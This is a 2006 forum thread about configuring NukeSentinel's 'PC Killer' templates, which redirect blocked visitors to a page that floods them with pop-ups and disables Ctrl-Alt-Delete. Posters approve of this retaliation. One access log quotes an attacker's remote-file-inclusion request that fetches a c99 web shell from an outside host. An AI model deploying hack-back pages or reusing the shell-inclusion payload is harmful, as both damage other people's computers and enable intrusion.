PC Killer files -no bite!

Regular Joined: Jun 19, 2006 Posts: 57

Hi,

Correct me if I am wrong but there seems to be an error in either the coding or the instructions for the PC Killer files.

The instructions say upload all files to your abuse folder BUT the code within the templates referencing the bite! ie the abuse.html file and code point to abuse/abuse.html which relative to the template files just will not exist - suggest it should be just abuse.html

If I am correct there must be a great number of people with toothless guard dogs out there.

--
Brian
(bsweb)

Sells PC To Pay For Divorce Joined: Posts: 5661

Quote:

NukeSentinel(tm) will forward the attacker to one of these template pages

pay attention to the word "forward"

does this rings a bell ?
if not.....sentinel has the option to use a custom url...
in this case it would be pointed topwards the abuse file...

Posted: Sat Jul 08, 2006 7:58 am

Good Afternoon hitwalker,

I appreciate what you are saying but I still believe this is not how the PC Killer files are meant to be accessed by the author of them.

I will explain what I mean:
By uploading the pc killer files you overwrite most but not all of the NS default abuse template files so in theory there is no reason to use the forward link to send abusers to abuse.html directly unless you wish to add bite to the one of the templates that were not replaced ie abuse_admin.tpl.

(On a side note personally I am glad that was not included in the K files as I managed to ban myself on more than one occasion shorty after installation) Embarassed

So as far as I can see the fact remains that the uploaded PC Killer template files (overwriting the default templates) still point to abuse.html in a directory that doesn't exist.

Please say I am correct otherwise I think I am going mad!

Posted: Sat Jul 08, 2006 8:09 am

but are you sure theres a problem?
The folder is called abuse calling it from the nuke root to abuse.html ,and all is there...meaning files that do excist....
so unless im missing something.....?

and btw...most security systems on a computer think theres a virus in the folder and therefore delete the "infected" file....
and yes.....thats abuse.html

Posted: Sat Jul 08, 2006 8:39 am

Sorry to go on but when NS calls one of the uploaded template files, does not that template file (in the abuse directory) try to load the file abuse/abuse.html into an iframe from that relative position within the abuse directory (not from the nuke root) therefore attempting to load (from the nuke root point of view)abuse/abuse/abuse.html?

Hope I'm not wrong or I will feel very silly now

Quote:

and btw...most security systems on a computer think theres a virus in the folder and therefore delete the "infected" file....
and yes.....thats abuse.html

Thanks but I think I managed to get it uploaded to the server in tact.
My AV is AVG Antivirus from Grisoft, either its very clever or a bit stupid like me.

Posted: Sat Jul 08, 2006 8:46 am

no...your wrong about that...
the root of nuke is already set and therefor the file will be found...
another approach.....
if this is true what you say......
that means raven and other coders that use it never noticed this....
now tell me........do you believe that ?

Posted: Sat Jul 08, 2006 9:10 am

Oh dear, me again I'm afraid.

Now what I did to test my theory was copy one of the PC killer template files and then substituted a test.html reference instead of abuse.html.

I then created a test.html file and uploaded both these to the abuse directory.

I then called the template file from my browser and the test.html file was not found.

I then created an abuse directory with the abuse direcory and moved the test.html file there. Then I called the template file again and test.html was found proving my point (or so I thought )

Quote:

another approach.....
if this is true what you say......
that means raven and other coders that use it never noticed this....
now tell me........do you believe that ?

Obviously no but maybe they do not bother with the template files and forward directly to the abuse.html file directly as you were suggesting at first, admitedly even that sounds a bit far fetched.

I can only assume that I am totally missing a fundimental point which I would be grateful if you could point out to me after reading this post to put me out of my misery.

Posted: Sat Jul 08, 2006 9:27 am

well i use it in a different way....
i dont use the templates....
point with the killer templates is that every person that runs into sentinel ends up with a computer hungup..

but now by using the forward i decide who gets toasted..

but basically from the root to abuse/abuse.html should be ok..
i dont know what your doing or testing and how.....
what you can try is to change :

Code:

<iframe frameborder="0" height="100%" name="abuse" src="abuse/abuse.html" width="100%">

to

Code:

<iframe frameborder="0" height="100%" name="abuse" src="/abuse/abuse.html" width="100%">

Posted: Sat Jul 08, 2006 9:49 am

So the template files are wrong after all then.

Also as the template and abuse.html files are in the same directory why not just

Code:

<iframe frameborder="0" height="100%" name="abuse" src="abuse.html" width="100%">

Just to complete the circle:
To quote the download page:

Quote:

HOW THEY WORK:
When there's an attack on your site NukeSentinel(tm) will forward the attacker to one of these template pages, where he/she will get more then they were looking for.... Smile

The templates in combination with the included abuse.js and abuse.html will render multiple pop-up windows and dissable the (ctrl)(alt)(delete) keys on the atacker PC. Forcing them to manualy shutdown thier PC.

If people use as described above the templates that are overwritten by PC Killer templates will not work as intended and there must be a great number of people with toothless guard dogs out there.

Right or wrong?

You must be really fed up with me by now, many thanks for your patience hitwalker.

Posted: Sat Jul 08, 2006 10:23 am

no thats ok....
but no matter what..
if someone gets banned the killer templates are just an addon to the banning process,a kick in the butt..

and just extra....

i use the forward to abuse.html and works flawless..
but ive send a pm to raven if he can reply to this...

Posted: Sat Jul 08, 2006 10:25 am

Please bear in mind these templates were created when Sentinel was in its infancy - at a guess, they are well over a year old and probably closer to two years old. The paths were obviously correct at that time.... but things may well have changed.....

I would take Hitwalkers advise and upload the templates etc anywhere you want (they do not HAVE to be in the abuse folder) and then simply use the 'forward to' option in the blocker settings.

Also, there are some things changed in the next version of Sentinel (2.2.5) which I cannot publicly discuss (until its official public release) but using something other than the abuse folder and using the forwarding as mentioned would be better - trust me.

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

When you use the PC Killer script, you place this in the Forward section of the blocker setting. Note that it's a fully qualified URI.

http://your_domain.com/abuse/abuse.htm

Now, please notice that in includes/nukesentinel.php, you find this code:

function abget_template($template="") {
global $nuke_config, $ab_config, $nsnst_const, $db, $prefix, $ip, $abmatch;
if(empty($template)) { $template = "abuse_default.tpl"; }
$sitename = $nuke_config['sitename'];
$adminmail = $nuke_config['adminmail'];
$adminmail = str_replace("@", "(at)", $adminmail);
$adminmail = str_replace(".", "(dot)", $adminmail);
$adminmail2 = urlencode($nuke_config['adminmail']);
$querystring = get_query_string();
$filename = "abuse/".$template;

This script is running relative to nuke root, so abuse/".$template; resolves correctly.

Posted: Sat Jul 08, 2006 1:57 pm

Many thanks for all the comments and advice.

When I want PC Killer to intervene I will ammend the blocker settings in the appropriate sections to forward as advised.

You probably have this in hand but just in case a suggestion:
I presume the description in the download section will be ammended so new subscribers will be informed and not waste their time just uploading and leaving their ns settings as they are.

I am really impressed by the program and website and (unusually) by all the excellent and quick support given.

Cheers
Cheers

Brian
(bsweb)

Posted: Wed Jul 12, 2006 6:57 am

I installed those files also and followed the steps as explained in the accompanied docs and when browsing my acces logs i found several references to users that used a shell99 attack being redirected and looped to the killer files so I guess it works how it should be.

Rene

Code:

88.240.136.70 - - [05/Jul/2006:17:33:09 -0400] "POST /SQuery/lib/armygame.php?libpath=http%3A%2F%2Fsvt.nukleon.us%2Ftools%2Fc99shell.txt%3Fcmc&act=f&f=HttpClient.class.php&ft=edit&d...


88.240.136.70 - - [05/Jul/2006:17:33:23 -0400] "GET / HTTP/1.1" 200 643 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:24 -0400] "GET /abuse/abuse.html HTTP/1.1" 200 2020 "http://www.teamfraggers.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:26 -0400] "GET /abuse/abuse.js HTTP/1.1" 200 2549 "http://www.teamfraggers.nl/abuse/abuse.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:27 -0400] "GET /abuse/GanjaUK.swf HTTP/1.1" 200 565 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:27 -0400] "GET /abuse/abuse.swf HTTP/1.1" 200 5024 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:31 -0400] "GET / HTTP/1.1" 200 643 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:32 -0400] "GET /abuse/abuse.html HTTP/1.1" 304 - "http://www.teamfraggers.nl/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:38 -0400] "GET /abuse/abuse.html HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:38 -0400] "GET /abuse/abuse.js HTTP/1.1" 304 - "http://www.teamfraggers.nl/abuse/abuse.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:39 -0400] "GET /abuse/GanjaUK.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:39 -0400] "GET /abuse/abuse.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:47 -0400] "GET /abuse/abuse.html HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:47 -0400] "GET /abuse/abuse.html HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:47 -0400] "GET /abuse/abuse.html HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:47 -0400] "GET /abuse/abuse.js HTTP/1.1" 304 - "http://www.teamfraggers.nl/abuse/abuse.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:47 -0400] "GET /abuse/abuse.js HTTP/1.1" 304 - "http://www.teamfraggers.nl/abuse/abuse.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:48 -0400] "GET /abuse/abuse.js HTTP/1.1" 304 - "http://www.teamfraggers.nl/abuse/abuse.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:48 -0400] "GET /abuse/GanjaUK.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:48 -0400] "GET /abuse/abuse.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:48 -0400] "GET /abuse/GanjaUK.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:49 -0400] "GET /abuse/abuse.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:49 -0400] "GET /abuse/GanjaUK.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"


88.240.136.70 - - [05/Jul/2006:17:33:49 -0400] "GET /abuse/abuse.swf HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

Posted: Wed Jul 12, 2006 7:20 am

Thanks Vartax, guess some clever coding fooled me! (that's not difficult)

Even so as Guardian2003 suggested:

Code:

Also, there are some things changed in the next version of Sentinel (2.2.5) which I cannot publicly discuss (until its official public release) but using something other than the abuse folder and using the forwarding as mentioned would be better - trust me.

Posted: Wed Jul 12, 2006 9:20 am

The reason I said that, now that the version is public is because didn't want you to over write any exisiting work you had done when you installed this new version of Sentinel.

You could of course modify the new templates to include the abuse script but for maximum flexibility I prefer to redirect mine.

Posted: Tue Jul 18, 2006 2:10 pm

NICE, In the new version 2.5.00 is that new feature to manage your templates and I thouhgt 'He let's see if and how those killer templates work out" pppfffttt was I lucky to have my IP protected Sad

man o man and how they work. really had to reboot my PC because those 30+ opening browser screens are not closable with F4 or any other combi.
Haha, while doing my daily acceslog scans I see a lot of script kiddo's getting trapped !!!!

Rene

registered · Posted: Tue Jul 18, 2006 8:40 pm

vartax, fun isn't it? Laughing

Posted: Wed Jul 19, 2006 6:38 am

This topic helped me a lot, thanks.

One thing I noticed though, when pointing my firefox browser to the abuse.html to test it, Firefox blocks the pop-ups and when I click the flash image on the page, it opens about 30 tabs in the one browser that I was able to simply close and it closed them all, no need to reboot for me.

Maybe IE users will get the full effect?

hitwalker, which of the blocker settings do you suggest I forward to the abuse page? All of them or just maybe union, filters admin and clike?